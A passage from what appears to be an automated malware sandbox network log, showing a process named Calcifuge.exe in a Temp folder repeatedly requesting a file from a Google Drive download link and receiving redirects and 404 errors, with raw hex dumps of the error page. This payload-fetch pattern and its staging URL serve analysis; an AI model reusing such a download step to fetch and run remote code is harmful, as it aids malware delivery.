                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 44 6e 4d 4d 36 56 71 42 75 4f 69 5f 38 39 53 73 46 44 32 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2DnMM6VqBuOi_89SsFD27w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.453568172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:59 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:00 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:00 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-ufYPDL2NbjaF7JZtrzdbwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.453578172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:01 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:01 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgRG8WkLb31Ut1ucvbr2b6uOvIsSfcQbaPVd9cSsYTzu6E44pj48xNhOmjYJafErMSkZ
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:01 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-EcPLHr66Dt5TCYJ6lXLqQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 4f 48 4c 73 65 6c 70 5f 45 34 45 7a 55 74 33 48 35 73 76 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dOHLselp_E4EzUt3H5svaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.453585172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:02 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:02 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:02 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-CdOcdSGGk-P-H1iEubm8kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.453595172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:03 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:03 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgT_x5rtIIXqYxIkKHJGIL5YYVD0Ec2JWNNgKtAL5EBKvaT7MOS6XWG3MVUUnS12bQVl
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:03 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-61RmDkyh32boM5cVfe-2Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4c 73 4f 57 61 46 76 76 63 6f 6e 59 46 41 2d 45 56 6b 58 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BLsOWaFvvconYFA-EVkXZw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.453602172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:04 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:04 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:04 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8nfhf8tl-qGMkIzNNdozOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.453609172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:05 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:06 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQWXf7ns6deNNoSXRMSz6eIaAnAEE0RhzmHg_oGEsZdcd75xEweEHosjEUMXDaAgf9UfAP9T84
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:05 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-IlHjAJcJ_9mfYtrLrqBjkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 7a 4e 75 68 4e 54 4f 57 76 32 4b 6a 6c 59 75 6e 41 71 58 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AzNuhNTOWv2KjlYunAqXtA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.453618172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:06 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:07 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-hUw8oBTtU2R8E64po2_dJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.453626172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
